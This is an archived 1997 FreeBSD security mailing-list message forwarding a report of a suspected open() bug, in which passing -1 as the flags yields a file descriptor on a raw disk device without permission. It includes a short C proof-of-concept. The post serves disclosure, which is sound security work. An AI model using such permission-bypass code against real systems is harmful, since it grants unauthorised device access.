Date: Wed, 22 Oct 1997 22:00:52 -0700 (PDT) From: dima@best.net (Dima Ruban) To: security@freebsd.org Subject: BoS: Possible SERIOUS bug in open()? (fwd) Message-ID: <199710230500.WAA11569@burka.rdy.com>
next in thread | raw e-mail | index | archive | help
----- Forwarded message from explorer@flame.org ----- >From burka.rdy.com!cyber.com.au!best-of-security-request Wed Oct 22 20:45:55 1997 Received: from flea.best.net by burka.rdy.com with ESMTP id UAA11248; (8.8.7/RDY) Wed, 22 Oct 1997 20:45:48 -0700 (PDT) Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24]) by flea.best.net (8.8.7/8.7.3) with ESMTP id UAA24740; Wed, 22 Oct 1997 20:44:57 -0700 (PDT) Received: (from slist@localhost) by plum.cyber.com.au (8.8.6/8.8.6) id MAA22418; Thu, 23 Oct 1997 12:13:42 +1000 (EST) Resent-Date: Thu, 23 Oct 1997 12:13:42 +1000 (EST) Date: 17 Oct 1997 10:42:13 -0000 Message-ID: <19971017104213.11040.qmail@kechara.flame.org> From: explorer@flame.org Sender: darrenr@cyber.com.au Old-Status: O Old-X-Originally-To: To: developers@NetBSD.ORG Old-X-Originated-From: From: explorer@flame.org Resent-Message-ID: <"4heHGD.A.NVC.gSjT0"@plum> X-Loop: best-of-security@cyber.com.au Errors-To: best-of-security-request@cyber.com.au Precedence: list Resent-Sender: best-of-security-request@cyber.com.au To: best-of-security@cyber.com.au Resent-From: best-of-security@cyber.com.au X-Mailing-List: <best-of-security@cyber.com.au> ftp://ftp.cyber.com.au/pub/archive/b-o-s/ X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request@cyber.com.au with Subject: unsubscribe Subject: BoS: Possible SERIOUS bug in open()? This was sent to me recently... It seems to be a pretty serious hole in open() and permissions... Note, in the following, open() succeeds, and ioctls are probably executed... /* * This will give you a file descriptor on a device you should not have * access to. This seems really, really screwed up, since holding a fd * lets you do a lot of ioctls that you should not be able to do... */ #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <err.h> int main(int argc, char **argv) { int fd; fd = open("/dev/rsd0a", -1, 0); if (fd < 0) err(1, "open"); } ----- End of forwarded message from explorer@flame.org ----- -- dima
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199710230500.WAA11569>